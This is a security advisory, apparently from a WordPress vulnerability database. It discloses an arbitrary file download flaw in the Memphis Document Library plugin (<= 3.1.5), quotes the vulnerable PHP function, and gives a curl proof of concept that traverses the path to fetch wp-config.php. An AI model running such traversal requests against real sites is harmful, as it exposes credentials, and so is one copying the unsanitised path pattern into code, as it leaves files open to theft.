Memphis Document Library Plugin <= 3.1.5 – Arbitrary File Download

Description

The function "mdocs_img_preview" is in charge of downloading image previews previously uploaded by the administrator, but it does not sanitize the file path being downloaded, thus, allowing to download arbitrary files in the file system.

The vulnerable GET parameter is "mdocs-img-preview".

The vulnerable code is in lines 90 to 93 of file "memphis-documents-library/mdocs-downloads.php":

87 function mdocs_img_preview() {
88 require_once(ABSPATH . 'wp-includes/pluggable.php');
89 $upload_dir = wp_upload_dir();
90 $image = $upload_dir['basedir'].MDOCS_DIR.$_GET['mdocs-img-preview'];
91 $content = file_get_contents($image);
92 header('Content-Type: image/jpeg');
93 echo $content; exit();
94 }

Proof of Concept

curl http://example.site.com/?mdocs-img-preview=../../../wp-config.php -o example-wp-config.php

Affects Plugins

memphis-documents-library

Fixed in 3.1.6

References

Exploitdb

39593

Miscellaneous

Submitter

Felipe Molina

Submitter twitter

felmoltor

Verified

WPVDB ID

53999c06-05ca-44f1-b713-1e4d6b4a3f9f

Timeline

Publicly Published

2016-03-22 (about 9 years ago)

Added

2016-03-22 (about 9 years ago)

Last Updated

2019-10-31 (about 6 years ago)

Other

Published

Title

Published

2020-10-29

Title

WordPress < 5.5.2 - Disable Spam Embeds from Disabled Sites on a Multisite Network

Published

2017-07-25

Title

Stop User Enumeration <= 1.3.8 - REST API Bypass

Published

2015-04-20

Title

Crayon Syntax Highlighter 2.0 - 2.6.10 - Defacement

Published

2019-05-06

Title

W3 Total Cache < 0.9.7.4 - Cryptographic Signature Bypass

Published

2017-03-03

Title

Adminer <= 1.4.5 - Security Bypass